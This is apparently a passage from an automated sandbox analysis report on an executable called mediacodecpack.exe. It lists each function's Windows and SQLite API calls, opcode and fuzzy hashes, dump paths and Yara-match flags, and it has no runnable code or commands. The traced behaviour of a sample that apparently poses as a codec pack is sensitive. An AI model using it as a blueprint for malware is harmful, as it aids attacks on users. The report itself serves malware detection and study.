                                                                                        • Opcode ID: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                        • Instruction ID: 2460327dcc54fba3be2b988abc8dcdb9b1e9a0a8134423c7c4e4248cbea0685f
                                                                                        • Opcode Fuzzy Hash: fedf09dc2174d101d172c4c0bb91e200648cc66d24cdd27f8ba12e2e2e5e7dc2
                                                                                        • Instruction Fuzzy Hash: 37C08C30A88200EFEA210B404F09FA43634A708705F3140E2B346340E082B90EA2AE0E
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040DD69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: Common AppData
                                                                                        • API String ID: 3660427363-2574214464
                                                                                        • Opcode ID: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                        • Instruction ID: 7de116b4efb22206a60a49d6e64df041c4b05bd6381c1080f431fe0b0fcf661a
                                                                                        • Opcode Fuzzy Hash: ab263f3a602ed345e702ad74f32ed8129ad5b37c684106ce94200781c9ebff29
                                                                                        • Instruction Fuzzy Hash: 39C04C70908105EADB114FA08E44E7E7678BE40740B21457B9053710D0D7789906B65B
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B04BF2
                                                                                          • Part of subcall function 00B01BA7: __EH_prolog.LIBCMT ref: 00B01BAC
                                                                                          • Part of subcall function 00B01BA7: RtlEnterCriticalSection.NTDLL ref: 00B01BBC
                                                                                          • Part of subcall function 00B01BA7: RtlLeaveCriticalSection.NTDLL ref: 00B01BEA
                                                                                          • Part of subcall function 00B01BA7: RtlEnterCriticalSection.NTDLL ref: 00B01C13
                                                                                          • Part of subcall function 00B01BA7: RtlLeaveCriticalSection.NTDLL ref: 00B01C56
                                                                                          • Part of subcall function 00B0D0FC: __EH_prolog.LIBCMT ref: 00B0D101
                                                                                          • Part of subcall function 00B0D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00B0D180
                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00B04CF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                        • String ID:
                                                                                        • API String ID: 1927618982-0
                                                                                        • Opcode ID: 5579a8c7bfd4a545c5dbecd8a2c5d292be1b3bc48fb5e2cb8b292b8eba956525
                                                                                        • Instruction ID: 0c50c462e94405225d4437b2d8799e68402e9d381a390252fdb7089b7257f67e
                                                                                        • Opcode Fuzzy Hash: 5579a8c7bfd4a545c5dbecd8a2c5d292be1b3bc48fb5e2cb8b292b8eba956525
                                                                                        • Instruction Fuzzy Hash: 2C510BB1D04248DFDB15DFA8C495AEEBFF4EF18310F1481AAE905AB392DB719A44CB50
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02D47
                                                                                        • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00B02D5C
                                                                                          • Part of subcall function 00B0950D: WSAGetLastError.WS2_32(00000000,?,?,00B02A51), ref: 00B0951B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Send
                                                                                        • String ID:
                                                                                        • API String ID: 1282938840-0
                                                                                        • Opcode ID: b664ee18fab229d98fd8b7fbf9b526670d555cec9d32d1e732a6f9f01b342dc5
                                                                                        • Instruction ID: a7771e54cd293477a40575c9fbc9a7c0b5420dbaed7cf79abd9a9ed449d24f39
                                                                                        • Opcode Fuzzy Hash: b664ee18fab229d98fd8b7fbf9b526670d555cec9d32d1e732a6f9f01b342dc5
                                                                                        • Instruction Fuzzy Hash: 4F0184B5500205AFD7306F95D88496BBFECEF4576572006BDF85993280DB709D018B61
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                          • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                        • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                          • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCreateDestroyVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2507506473-0
                                                                                        • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                        • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                        • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                        • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                        APIs
                                                                                        • lstrcmpiW.KERNELBASE(?), ref: 0040230F
                                                                                        • lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                        • API String ID: 1586166983-2037762836
                                                                                        • Opcode ID: 3f0c9d6c28f36c4cda97f59a851c5945851b368a4b196ea0daf740ef6fd4933c
                                                                                        • Instruction ID: 49038fb2ec3d825e67705f3a2b78a953a8be5b70ab98e67aaa9033b67ec783d8
                                                                                        • Opcode Fuzzy Hash: 3f0c9d6c28f36c4cda97f59a851c5945851b368a4b196ea0daf740ef6fd4933c
                                                                                        • Instruction Fuzzy Hash: 54E02B71D052458FC7248B20995AEF13BB0AF01300F2540FFD449A20E3CB3D4916EB5E
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B0511E
                                                                                          • Part of subcall function 00B03D7E: htons.WS2_32(?), ref: 00B03DA2
                                                                                          • Part of subcall function 00B03D7E: htonl.WS2_32(00000000), ref: 00B03DB9
                                                                                          • Part of subcall function 00B03D7E: htonl.WS2_32(00000000), ref: 00B03DC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htonl$H_prologhtons
                                                                                        • String ID:
                                                                                        • API String ID: 4039807196-0
                                                                                        • Opcode ID: ec2d7480c3057a7d4be4158222ce1490752ded34b6d2360988d1814a79e88a18
                                                                                        • Instruction ID: 94e4a03794dcf270cb0eb82f8036bc112d1316b9d8dd3880f4679c25ead83432
                                                                                        • Opcode Fuzzy Hash: ec2d7480c3057a7d4be4158222ce1490752ded34b6d2360988d1814a79e88a18
                                                                                        • Instruction Fuzzy Hash: 0E813872D0424E8ECF15DFA8D1909EEBBF4EF48310F24819AE851B7281EB755A05CF65
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B0D9CA
                                                                                          • Part of subcall function 00B01A01: TlsGetValue.KERNEL32 ref: 00B01A0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prologValue
                                                                                        • String ID:
                                                                                        • API String ID: 3700342317-0
                                                                                        • Opcode ID: d70a36f766c66472efc43481fdae93900984d1c36d30536c970e33f33ae59ff4
                                                                                        • Instruction ID: fb8da41dd8682b6b80b2964dbc6b0fb70af1a62e596dfb38dc29efd97260a290
                                                                                        • Opcode Fuzzy Hash: d70a36f766c66472efc43481fdae93900984d1c36d30536c970e33f33ae59ff4
                                                                                        • Instruction Fuzzy Hash: A42131B1A04209AFDB04DFA9D441AFEBBF8EF49314F10416EE914E7281D775AA00CBA1
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B0D55A
                                                                                          • Part of subcall function 00B026DB: RtlEnterCriticalSection.NTDLL(?), ref: 00B02706
                                                                                          • Part of subcall function 00B026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00B0272B
                                                                                          • Part of subcall function 00B026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B23173), ref: 00B02738
                                                                                          • Part of subcall function 00B026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00B02778
                                                                                          • Part of subcall function 00B026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 00B027D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                        • String ID:
                                                                                        • API String ID: 4293676635-0
                                                                                        • Opcode ID: a85d0d367e5d82c693b034f31d471300beb2ce5e705d24d2eb5788bcc14de233
                                                                                        • Instruction ID: 90ab222fbc7a877f04875a005bfc9f24f6ccafed34334b668ae06de4c9d2e20b
                                                                                        • Opcode Fuzzy Hash: a85d0d367e5d82c693b034f31d471300beb2ce5e705d24d2eb5788bcc14de233
                                                                                        • Instruction Fuzzy Hash: 6A0190B1900B189FC328DF1AD544945FBF4EF88310B15C5AE945D9B722E7B5DA40CF94
                                                                                        APIs
                                                                                        • RegCreateKeyExA.KERNELBASE ref: 00402067
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                        • Instruction ID: dc96bbfccdb8053c3a700f92ee76c71f5d4f4b682c0e303dba9fd296f600d57d
                                                                                        • Opcode Fuzzy Hash: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                        • Instruction Fuzzy Hash: 6AF03A9452C1C58AC7528B746FA05E13FB0952730475810BAD1C5BB2A3D13C4C4BFB2E
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B0D339
                                                                                          • Part of subcall function 00B127C5: _malloc.LIBCMT ref: 00B127DD
                                                                                          • Part of subcall function 00B0D555: __EH_prolog.LIBCMT ref: 00B0D55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prolog$_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 4254904621-0
                                                                                        • Opcode ID: 1543d5d831f72094edc440dc1bf18ecf791fbccb6e1a8496acdb45e5052a5ee6
                                                                                        • Instruction ID: 515be0333dfe05a34a17ac2f5edad8b6f2254f89b4d9ff49c2a5d8baef0bd2d7
                                                                                        • Opcode Fuzzy Hash: 1543d5d831f72094edc440dc1bf18ecf791fbccb6e1a8496acdb45e5052a5ee6
                                                                                        • Instruction Fuzzy Hash: 1CE08C71A00109ABDB19EFA8A81276D7BF1EB48700F0046EEB80DE2681EB318E108614
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                        • Instruction ID: d9ce72db35be277be2e25491e2fe96756ac457275e591dcd62e6f552b6e7838d
                                                                                        • Opcode Fuzzy Hash: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                        • Instruction Fuzzy Hash: EFE04F545281C58FC7518B74AFA09E13FB082263507951065D1C5AF223C53C0C0AF71E
                                                                                        APIs
                                                                                          • Part of subcall function 00B148CA: __getptd_noexit.LIBCMT ref: 00B148CB
                                                                                          • Part of subcall function 00B148CA: __amsg_exit.LIBCMT ref: 00B148D8
                                                                                          • Part of subcall function 00B124A3: __getptd_noexit.LIBCMT ref: 00B124A7
                                                                                          • Part of subcall function 00B124A3: __freeptd.LIBCMT ref: 00B124C1
                                                                                          • Part of subcall function 00B124A3: RtlExitUserThread.NTDLL(?,00000000,?,00B12483,00000000), ref: 00B124CA
                                                                                        • __XcptFilter.LIBCMT ref: 00B1248F
                                                                                          • Part of subcall function 00B17954: __getptd_noexit.LIBCMT ref: 00B17958
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                        • String ID:
                                                                                        • API String ID: 1405322794-0
                                                                                        • Opcode ID: 9e456ca6f6ec58128b98b7dd113a1f581a0d814e98fbd979a81a32205fc67036
                                                                                        • Instruction ID: 8b4e14492d968ac550423d1f3d270a1febe5ef51cbbcce8869a77d8fc39b2ec8
                                                                                        • Opcode Fuzzy Hash: 9e456ca6f6ec58128b98b7dd113a1f581a0d814e98fbd979a81a32205fc67036
                                                                                        • Instruction Fuzzy Hash: B1E0ECB1D44605AFEB08EBA0D94AFAE77F5AF44311F6001D9F101AB2B2DA749D94DA20
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID:
                                                                                        • API String ID: 71445658-0
                                                                                        • Opcode ID: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                        • Instruction ID: d713a23b53c9c0110701be63413fe7ba467f275e167bf38fafe440168cb698c8
                                                                                        • Opcode Fuzzy Hash: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                        • Instruction Fuzzy Hash: CBC01230A0C105D9D7408AB09A482F933A06B10344F2049379003B31E0D7BC96477A1F
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                        • Instruction ID: 3ae1305fe96f7b026bdce6d5508892710976a9331c56da0873e7a2e16a087c10
                                                                                        • Opcode Fuzzy Hash: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                        • Instruction Fuzzy Hash: 59C08C00058140D2D6621B80830C228BA60EC0132837105BB89C2B08E2C93E4002639F
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CopyFile
                                                                                        • String ID:
                                                                                        • API String ID: 1304948518-0
                                                                                        • Opcode ID: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                        • Instruction ID: 7bbc41cb3671d7189b02c36164488bf25c771ca428d4fc6e3714b0364fd68ab0
                                                                                        • Opcode Fuzzy Hash: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                        • Instruction Fuzzy Hash: 85B09270904009ABC6148A508E44AB726B89704B41F5604BB944BF10D0DB3D8A4EE92A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                        • Instruction ID: 18e5a28a3b3dd855b8cfa4906261ab54779018c6ab8ca9ff62ca61d76da0e4fd
                                                                                        • Opcode Fuzzy Hash: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                        • Instruction Fuzzy Hash: 02A002215546019AD1483771AB4EB3839106701705F15417B7396750E34DB80186591F
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ManagerOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1889721586-0
                                                                                        • Opcode ID: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                        • Instruction ID: 2654581188708fff4f1950a7e9f7eb320ae01a33822ca65d1bb5e0d43ee44f7c
                                                                                        • Opcode Fuzzy Hash: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                        • Instruction Fuzzy Hash: 24A022200000008ACBA02F880A8800C3000803A2003220838C00AF00A0EA30808CB20E
                                                                                        APIs
                                                                                          • Part of subcall function 00B10620: OpenEventA.KERNEL32(00100002,00000000,00000000,F67D60A1), ref: 00B106C0
                                                                                          • Part of subcall function 00B10620: CloseHandle.KERNEL32(00000000), ref: 00B106D5
                                                                                          • Part of subcall function 00B10620: ResetEvent.KERNEL32(00000000,F67D60A1), ref: 00B106DF
                                                                                          • Part of subcall function 00B10620: CloseHandle.KERNEL32(00000000,F67D60A1), ref: 00B10714
                                                                                        • TlsSetValue.KERNEL32(0000002B,?), ref: 00B111BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandle$OpenResetValue
                                                                                        • String ID:
                                                                                        • API String ID: 1556185888-0
                                                                                        • Opcode ID: 0526c25b23751cc7569be3105ae971c4359c16218c0507e15d4ff95e3a352ec3
                                                                                        • Instruction ID: 796803f8618229428191d3f6a04c67ed90314bbc83474009a0b954bd77154ca1
                                                                                        • Opcode Fuzzy Hash: 0526c25b23751cc7569be3105ae971c4359c16218c0507e15d4ff95e3a352ec3
                                                                                        • Instruction Fuzzy Hash: B301A271A04204AFC714DF59DD46B9EBBECEB05771F1047AAF924D33D0D77169408AA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                        • Instruction ID: 763a04054358afd8034bdf58efe23934774701223f643223d2c193f16d8f67d7
                                                                                        • Opcode Fuzzy Hash: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                        • Instruction Fuzzy Hash: 07D0C930C14028EFCB155B91E948CADFF71FB0C301B110067F481B65A1D33D4416BB15
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0040D4FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                        • Instruction ID: abf7d64f5ecc0974fd71cc89ec6167098742f4484bef6f8b47254da587dc98f1
                                                                                        • Opcode Fuzzy Hash: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                        • Instruction Fuzzy Hash: D3A0027298D640C7D18C2B906B0972535746F40701F36A03B9397744F19ABC364E7A5F
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                        • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                        • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                        • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                        • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                        • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                        • memcmp.MSVCRT ref: 60967D4C
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                        • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                        • sqlite3_free.SQLITE3 ref: 60968002
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                          • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                          • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                        • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                        • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                        • sqlite3_step.SQLITE3 ref: 60968139
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
